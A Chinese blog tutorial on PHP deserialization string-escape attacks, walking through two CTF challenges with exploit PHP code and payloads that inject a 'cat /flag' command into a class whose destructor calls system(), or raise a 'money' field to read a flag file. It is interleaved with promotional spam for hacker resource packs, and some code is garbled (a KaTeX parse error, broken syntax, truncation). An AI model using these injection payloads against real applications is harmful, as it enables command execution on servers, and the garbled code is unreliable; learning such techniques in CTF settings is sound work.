2024年网络安全最全php反序列化学习之字符串逃逸，2024年最新20道高频面试题（含答案）

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G，朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》，可以扫描下方二维码领取（如遇扫码问题，可以在评论区留言领取哦）~

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

$tar=‘";s:4:“info”;s:6:“hacker”;}’; //27
$payload=get\_payload{(}^{\prime }{b}^{\prime },strlen($tar),$tar); //利用getpayload生成利用的payload
$test1->name=$payload;
print_r(KaTeX parse error: Undefined control sequence: \n at position 9: test1)."\̲n̲"; print\_r(ser…test1)).“\n”;
$res=filter\_repmore(serialize($test1));
echo “\n”.$res.“\n”;
$c=unserialize($res);
print_r($c);
?>

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/15d5a393504f40aa9e42e41a262a5d9f.png#pic_center)  
 可以看到，info的值被修改了


接下来以一道简单的题目来讲构造流程


#### 题目实战


newstarctf 2024 week4 逃


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/ef79a750748c4633a44e258c2262c1fc.png#pic_center)


可以看到，这里有个waf过滤函数，把对象序列化并过滤后再反序列化，是过滤后变长的题型


总体思路—>利用我们能控制的key去修改cmd，在\_\_destruct中system执行cmd


具体实现:


1拿下来源码放在本地，稍作修改:

<?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd key= class GetFlag { public $key='123'; public $cmd = "ls"; #cmd是我们要去修改的，先写死 public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } echo serialize(new GetFlag()); # ``` 这段代码就是查看正常的序列化后的字符串（其中含有我们想要的cmd值），当然如果对序列化熟悉的话可以直接构造payload  把红框部分拿下来即可 2.配合前面写的get\_payload函数构造payload，并在本地尝试是否成功 bad被替换为good，一个bad可以逃逸一个字符，所以需要直接传入序列化字符串长度即可  可以看到，在本地实验成功，接下来只要修改cmd的值为其他系统命令，**再修改序列化字符串中cmd的长度**，然后把$payload传过去即可 最后的exp: ``` <?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd class GetFlag { public $key='ls'; public $cmd = "whoami"; public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } $key='";s:3:"cmd";s:9:"cat /flag";}'; $payload=get\_payload('bad',strlen($key),$key); echo "\n".$payload; ?>

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/3d151f693b734d32a4ae325cd3baa859.png#pic_center)  
 把payload赋值为key即可，


结果:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7354fa75b6cf4340a6cf40bc5100b8d6.png#pic_center)


### 过滤后变短


#### 实验学习

<?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } ``` 像上面的过滤函数，把b替换为空，替换后序列化的字符串长度减少，就是过滤后变短的情况，这一种就是与变长不同，要利用两个变量（info和name）去修改两个变量（info和password） 第一步，也是要先拿到我们含有修改目标的序列化字符串,name值随意  我们的目的也是一样的，要通过";构造闭合，然后让php来反序列化我们设计好的序列化字符串，从而修改变量，尝试把info的值赋值为上面红框里的序列化字符串，那为什么不跟变长的类型一样，直接把序列化字符串跟在name的值后面呢？看下图:  如果跟在name后面，由于name的长度本身就很长，过滤后name的值变短了，我们的序列化字符串就会被读取为name的值(逃不出去)，就无法发挥它的作用了，所以要把info的值设为序列化字符串  如果要让绿框内的字符串正常反序列化，而不是被当作字符串读取，红框内的全部内容就填充进name的值中，";s:4:“info”;s:60:"长度为19，**如果name的值设为19个b，经过过滤函数过滤为空后，那么php就会往下读取，把本不该读取的 “;s:4:“info”;s:60:” 读取为name的值，后面的序列化字符串就会逃逸出去，不被当作字符串来读取，而是被成功反序列化，修改info** 完整实验代码: ``` <?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } $test1=new C(); echo serialize($test1)."\n"; $tar='";s:4:"info";s:6:"hacker";s:8:"password";s:10:"helloworld";}'; $test1->name=get\_payload('b',19); $test1->info=$tar; print\_r(($test1)); $res=serialize($test1); $r=filter\_repless($res); echo $res; echo "\n".$r."\n"; $c=unserialize($r); print\_r($c); ?>

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/902eb66514234c47be1e128de80aee89.png#pic_center)


反序列化成功，password被修改，name具体要多少个被替换的字符，要根据题目实际来计算


#### 题目实战


上网找了一个也是比较简单的题目的源码

<?php show\_source("index123.php"); //error\_reporting(0); function filter($str) { return preg\_replace('/abc|zcxx/','',$str); } class Login{ public $name; public $pwd; public $money; public function \_\_construct() { $this->name=$\_GET['name']; $this->pwd=$\_GET['pwd']; $this->money='999'; } } if($\_GET['name']&&$\_GET['pwd']) { $login = new Login(); $last = unserialize(filter(serialize($login))); if ($last->money < 1000) { echo('get more money'); } else { echo file\_get\_contents('flag.php'); } } else { die("name and password can't be null"); } ?>

由源码可知，需要修改money参数>1000,才能拿到flag，name和pwd是我们可以控制的，利用name和pwd修改money，由过滤函数可知过滤后变短的题型，


1.本地拿下源码，先构造出包含（money=1001，pwd的属性和值） 的正常的序列化后的字符串，目的就是赋值给pwd，在反序列化时能够按照我们设定的来反序列化，从而修改money**别忘记开头要包含 "; 来手动闭合**


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/186c9a4d974348db9d1cb8b965d3c2da.png#pic_center)


2.然后先把name赋值给abc，查看过滤后的序列化字符串，计算要逃逸的字符数量


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/46f3c956550548a79375aee7d72357cc.png#pic_center)


如上图，我们的目的是，在反序列化时 “;s:3:“pwd”;s:46:” 时作为name的字符串内容来读取，后面的红框内容就可以逃出去，按照反序列化流程来修改money， “;s:3:“pwd”;s:46:” 长度为18，一个abc能提供3个字符逃逸，所以我们把name赋值为6个abc即可


最终exp:

<?php include "func.php"; function filter($str) { return preg\_replace('/abc|zcxx/','',$str); } class Login{ public $name; ### 给大家的福利 **零基础入门** 对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。  同时每个成长路线对应的板块都有配套的视频提供：  因篇幅有限，仅展示部分资料 **网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。** **[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)** **一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**